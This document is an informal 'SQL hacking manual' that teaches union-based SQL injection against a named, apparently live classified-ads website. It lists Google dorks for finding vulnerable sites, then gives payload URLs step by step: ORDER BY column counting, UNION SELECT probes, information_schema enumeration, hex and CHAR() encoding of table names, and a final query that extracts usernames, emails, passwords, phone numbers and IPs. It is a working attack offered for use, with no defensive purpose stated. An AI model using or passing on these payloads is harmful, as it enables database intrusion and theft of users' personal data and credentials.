Sql hacking Manual

(: Let's Start :)1.Find VULNERABLE WEBSITE'

-USE GOOGLE DORK TO FIND VULNERABLE SITES:

You can use these code's:

"inurl:index.php?catid="

"inurl:news.php?catid="

"inurl:index.php?id="

"inurl:news.php?id="

"inurl:".php?catid=" site:xxx"

2.You got the website,its sql vulnerable and we will start:

(I will use my vulnerable website)

Quote:http://wantadsonline.com/index.php?cat=3

Code:

page is loaded,now just add " ' " and click enter

http://wantadsonline.com/index.php?cat=3' -ERROR

Ok,now just add to adress "order by 10"

it will look like this "http://wantadsonline.com/index.php?cat=3 order by 10--"

oOps ) we got this' [Error: Unknown column '10' in 'order clause']

now just put "order by 4--"

it will look like this one "http://wantadsonline.com/index.php?cat=3 order by 4--"

and we got -[Error: Unknown column '4' in 'order clause']

now reduce the number of one, it will be 3

so put "order by 3--"

Like "http://wantadsonline.com/index.php?cat=3 order by 3--" in my case'

AND -[No Error]-

Yeah

-FINDING VULNERABLE COLUMN TO PERFORM ATTACK:

*Now just add "union all select 1,2,3--" like this "http://wantadsonline.com/index.php?cat=3 union all select 1,2,3--"

-COLUMN "1" is vulnerable,

CHECKING DATABASE VERSION:

Now add "Union all select @@version 2,3--"

"http://wantadsonline.com/index.php?cat=3 union all select @@version,2,3--"

CHECKING DATABASE NAME:

By adding "union all select database(),2,3--"

http://wantadsonline.com/index.php?cat=3 union all select database(),2,3--

GETTING TABLE NAMES:

you need to add "union all select table_name,2,3 from information_schema.tables--"

http://wantadsonline.com/index.php?cat=3 union all select table_name,2,3 from information_schema.tables--

GETTING COLUMNS NAMES:

union all select column_name,2,3 from information_schema.columns--"

Like in "Getting table names" just replace schema.tables-- vith schema.columns--

http://wantadsonline.com/index.php?cat=3 union all select column_name,2,3 from information_schema.columns--

GETTING COLUMNS NAMES FROM A CERTAIN TABLE:

METHOD 1:

[CONVERTING TABLE NAME TO HEX]

I will help you there,

website that I use for this is

[http://www.string-functions.com/string-hex.aspx]

Now whan you finish converting,it will look like

[http://wantadsonline.com/index.php?cat=3 union all select column_name,2,3 from information_schema.columns WHERE table_name=0xhex value--]

AFTER PUTTING HEX VALUE:

"http://wantadsonline.com/index.php?cat=3 union all select column_name,2,3 from information_schema.columns WHERE table_name=0x75736572--"

METHOD 2:

[CONVERTING TABLE NAME TO ASCII]

Ok,i will help here to

website for converting table name to ascii

[http://getyourwebsitehere.com/jswb/text_to_ascii.html]

After convert:

http://wantadsonline.com/index.php?cat=3 union all select column_name,2,3 from information_schema.columns WHERE table_name=char(ASCII VALUE)--

CODE: user

Delete all the ";" , "#" , and "&". So it should look like this.

CODE: 117,115,101,114

AFTER PUTTING ASCII VALUE:

http://wantadsonline.com/index.php?cat=3 union all select column_name,2,3 from information_schema.columns WHERE table_name=char(117,115,101,114)--

Last method- GETTING USER INFO:

There is a function called concat() that allows me to join the two columns and display on the page. Also I will be using :(colon) in the hex form. Its hex value is 0x3a(thats zero at beginning not alphabet o.)

http://wantadsonline.com/index.php?cat=3 union all select concat(user_name,0x3a,email,0x3a,passwd,0x3a,tel,0x3a,city,0x3a,ip),2,3 from user--

YOU ARE DONE!!!